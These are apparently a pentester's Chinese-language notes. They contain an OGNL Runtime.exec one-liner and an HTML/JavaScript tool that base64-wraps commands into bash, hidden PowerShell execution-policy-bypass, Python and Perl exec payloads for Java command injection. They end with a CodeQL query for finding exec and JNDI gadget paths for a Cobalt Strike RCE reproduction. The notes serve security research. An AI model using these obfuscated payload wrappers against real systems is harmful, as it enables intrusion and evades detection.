
反弹shell

@java.lang.Runtime@getRuntime().exec(‘id’)

base64编码工具

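<!DOCTYPE html>
<html>
<head>
<title>java runtime exec usage...</title>
</head>
<body>
<!-- Exactly one of the four radios is checked at any time (bash by default);
     every click re-runs processInput() so the output follows the selection. -->
<p>Input type:
<input type="radio" id="bash" name="option" value="bash" onclick="processInput();" checked=""><label for="bash">Bash</label>
<input type="radio" id="powershell" name="option" value="powershell" onclick="processInput();"><label for="powershell">PowerShell</label>
<input type="radio" id="python" name="option" value="python" onclick="processInput();"><label for="python">Python</label>
<input type="radio" id="perl" name="option" value="perl" onclick="processInput();"><label for="perl">Perl</label></p>

<!-- #input is the text the user types; #output is read-only and selects itself on click. -->
<p><textarea rows="10" style="width: 100%; box-sizing: border-box;" id="input" placeholder="Type Bash here..."></textarea>
<textarea rows="5" style="width: 100%; box-sizing: border-box;" id="output" onclick="this.focus(); this.select();" readonly=""></textarea></p>

<script>
// The two textareas above; both are resolved once at load time.
var taInput = document.querySelector('textarea#input');
var taOutput = document.querySelector('textarea#output');

/**
 * Re-encode the text in #input into #output for the interpreter selected by
 * the checked "option" radio.
 *
 * Reads:  the checked radio's value and taInput.value.
 * Writes: taInput.placeholder (per selection) and taOutput.value.
 * Notes:  btoa() throws for characters outside Latin-1, in which case the
 *         output is not updated. Empty input always yields an empty output.
 */
function processInput() {
  // Safe to dereference: the "bash" radio is checked="" in the markup, so a
  // checked radio always exists.
  var option = document.querySelector('input[name="option"]:checked').value;

  switch (option) {
    case 'bash':
      taInput.placeholder = 'Type Bash here...';
      taOutput.value = 'bash -c {echo,' + btoa(taInput.value) + '}|{base64,-d}|{bash,-i}';
      break;
    case 'powershell':
      taInput.placeholder = 'Type PowerShell here...';
      // Fix: the original assigned to an undeclared name, creating an implicit
      // global; declare it locally instead.
      var poshInput = '';
      // A NUL byte follows each character because -Enc expects the base64 of
      // UTF-16LE text, which for Latin-1 characters is "char, 0x00".
      // '\u0000' is the same string unescape("%00") produced.
      for (var i = 0; i < taInput.value.length; i++) {
        poshInput += taInput.value[i] + '\u0000';
      }
      taOutput.value = 'powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc ' + btoa(poshInput);
      break;
    case 'python':
      taInput.placeholder = 'Type Python here...';
      // Relies on str.decode('base64'), which only Python 2 provides.
      taOutput.value = "python -c exec('" + btoa(taInput.value) + "'.decode('base64'))";
      break;
    case 'perl':
      taInput.placeholder = 'Type Perl here...';
      taOutput.value = "perl -MMIME::Base64 -e eval(decode_base64('" + btoa(taInput.value) + "'))";
      break;
    default:
      taOutput.value = '';
  }

  // btoa('') is '', so the branches above would otherwise emit a wrapper
  // around nothing; blank input clears the output instead.
  if (!taInput.value) taOutput.value = '';
}

// Re-encode on every keystroke/paste; the radios trigger processInput() via onclick.
taInput.addEventListener('input', processInput, false);
</script>
</body>
</html>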

Shell、命令等,上传到java的时候,base64编码一下

web攻击

一些注入攻击、bp改包等攻击,注意url编码一下

代码审计的时候,可以用codeQL,用来查找漏洞函数

代码审计的时候,因为代码太多了,函数也太多了,就可以用codeQL来找一些符合条件的函数。

应用场景:你需要找一个函数,他传入的参数是String类型,而且返回的值也是String类型,还有就是函数名字是setXxx这样的

cs rce CVE-2022-39197 漏洞复现

CS_XSS.ql

/**
* @kind path-problem
*/
import java
//查找source的类到恶意类的通路
//source有xxx属性、有setXXX方法且有一个String参数、instanceof Component

/**
 * A candidate entry point: a `setXxx` method with exactly one parameter whose
 * type is named `String`, declared on a type that is `java.awt.Component` or
 * has it among its (transitive) supertypes.
 *
 * `matches("set_%")` holds for names that begin with `set` and have at least
 * one further character, i.e. the same condition as
 * `indexOf("set") = 0 and length() > 3`.
 */
class XXXSetMethod extends Method {
  XXXSetMethod() {
    this.getName().matches("set_%") and
    this.getNumberOfParameters() = 1 and
    this.getAParamType().hasName("String") and
    this.getDeclaringType().getASupertype*().hasQualifiedName("java.awt", "Component")
  }
}

/**
 * A method named `lookup` declared on a type whose ancestor chain includes
 * `javax.naming.Context` (i.e. a JNDI lookup).
 */
class JNDIMethod extends Method {
  JNDIMethod() {
    this.getName() = "lookup" and
    this.getDeclaringType().getAnAncestor().hasQualifiedName("javax.naming", "Context")
  }
}
/**
 * Any method named `invoke`, whatever its declaring type or signature.
 * This is not restricted to reflective `Method.invoke`, which is presumably
 * why `TargetMethod` keeps it commented out.
 */
class InvokeMethod extends Method {
  InvokeMethod() { this.getName() = "invoke" }
}

/**
 * A method that directly calls some method named `newInstance`.
 *
 * NOTE(review): `type` appears only on the right-hand side of the last
 * equality and is otherwise unconstrained, so the `exists` adds no
 * restriction beyond "has a callee named `newInstance`" as long as the
 * `getDeclaringType*()` expression has some result — confirm this is the
 * intended meaning. Not referenced by `TargetMethod` (commented out there).
 */
class NewInstanceMethod extends Method {
NewInstanceMethod() {
exists(RefType type, Method m|
this.getACallee() = m and
m.hasName("newInstance") and
m.getDeclaringType*().getErasure() = type
)
}
}
/**
 * A method with a direct callee that the CodeQL Java library models as an
 * external-command launcher (`ExecCallable`).
 */
class CommandInjectMethod extends Method {
  CommandInjectMethod() {
    exists(ExecCallable launcher | launcher = this.getACallee())
  }
}
/**
 * `java.lang.Runtime.exec` (any overload).
 * Defined but not used: `TargetMethod` relies on the library class
 * `MethodRuntimeExec` for the same purpose.
 */
class RuntimeMethod extends Method {
  RuntimeMethod() {
    this.getName() = "exec" and
    this.getDeclaringType().hasQualifiedName("java.lang", "Runtime")
  }
}

/**
 * Sinks for the path search: the library classes `MethodRuntimeExec` and
 * `MethodProcessBuilderCommand`, any method calling an `ExecCallable`, and
 * JNDI `lookup`. `InvokeMethod` and `NewInstanceMethod` are left disabled.
 */
class TargetMethod extends Method {
  TargetMethod() {
    this instanceof MethodRuntimeExec or
    this instanceof MethodProcessBuilderCommand or
    this instanceof CommandInjectMethod or
    this instanceof JNDIMethod
    // Disabled alternatives, kept for reference:
    // or this instanceof InvokeMethod
    // or this instanceof NewInstanceMethod
  }
}


query predicate edges(Method a, Method b) { a.polyCalls(b) }

// Report every candidate setter from which a target method is reachable
// through zero or more `edges` steps. Because the closure is reflexive, a
// setter that is itself a `TargetMethod` is reported with `end = entryPoint`.
from XXXSetMethod entryPoint, TargetMethod end
where edges*(entryPoint, end)
// Column order required by @kind path-problem: element, path source, path sink, message.
select entryPoint, entryPoint, end, "Found a path from start to target."
